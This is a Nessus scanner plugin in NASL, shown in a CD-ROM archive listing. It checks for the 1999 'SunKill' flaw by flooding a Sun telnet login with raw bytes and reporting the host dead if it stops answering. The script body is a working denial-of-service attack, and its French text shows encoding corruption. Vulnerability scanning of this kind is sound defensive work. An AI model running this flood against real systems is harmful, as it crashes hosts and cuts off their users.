home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / sunkill.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  95 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10272);
  10.  script_version ("$Revision: 1.15 $");
  11.  script_cve_id("CVE-1999-0273");
  12.  
  13.  name["english"] = "SunKill";
  14.  name["francais"] = "SunKill";
  15.  script_name(english:name["english"], francais:name["francais"]);
  16.  
  17.  desc["english"] = "It was possible to make the
  18. remote Sun crash by flooding it with ^D characters
  19. instead of entering our login.
  20.  
  21. This flaw allows an attacker to prevent
  22. your network from working properly.
  23.  
  24.  
  25. Solution : Upgrade your telnet server and filter
  26. the incoming traffic to this port.
  27.  
  28. Risk factor : High";
  29.  
  30.  desc["francais"] = "Il s'est avΘrΘ possible de
  31. faire planter la Sun distante en l'inondant
  32. de caractΦres ^D α la place d'entrer un nom
  33. de login.
  34.  
  35. Ce problΦme permet α un pirate d'empecher
  36. votre rΘseau de fonctionner correctement.
  37.  
  38.  
  39. Solution : Mettez α jour votre serveur telnet, et
  40. filtrez le traffic entrant vers ce port.
  41.  
  42. Facteur de risque : ElevΘ";
  43.  
  44.  script_description(english:desc["english"], francais:desc["francais"]);
  45.  
  46.  summary["english"] = "Crashes the remote Sun";
  47.  summary["francais"] = "Plante la Sun distante";
  48.  script_summary(english:summary["english"], francais:summary["francais"]);
  49.  
  50.  script_category(ACT_KILL_HOST);
  51.  
  52.  
  53.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  54.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  55.  family["english"] = "Denial of Service";
  56.  family["francais"] = "DΘni de service";
  57.  script_family(english:family["english"], francais:family["francais"]);
  58.  script_dependencie("find_service.nes", "wingate.nasl");
  59.  script_exclude_keys("wingate/enabled");
  60.  script_require_ports(23, "Services/telnet");
  61.  exit(0);
  62. }
  63.  
  64. #
  65. # The script code starts here
  66. #
  67.  
  68. # Wingate doesnt establish properly the telnet
  69. # session, so if we know that we are facing it,
  70. # we go away
  71.  
  72. wingate = get_kb_item("wingate/enabled");
  73. if(wingate)exit(0);
  74.  
  75. port = get_kb_item("Services/telnet");
  76. if(!port)port = 23;
  77. if(get_port_state(port))
  78. {
  79.  soc = open_sock_tcp(port);
  80.  if(soc)
  81.  {
  82.   c = telnet_init(soc);
  83.   d = raw_string(0x255);
  84.   data = crap(length:2550, data:d);
  85.   send(socket:soc, data:data);
  86.   close(soc);
  87.   soc2 = open_sock_tcp(port);
  88.   if(!soc2){
  89.       set_kb_item(name:"Host/dead", value:TRUE);
  90.     security_hole(port);
  91.     }
  92.   else close(soc2);
  93.   }
  94. }
  95.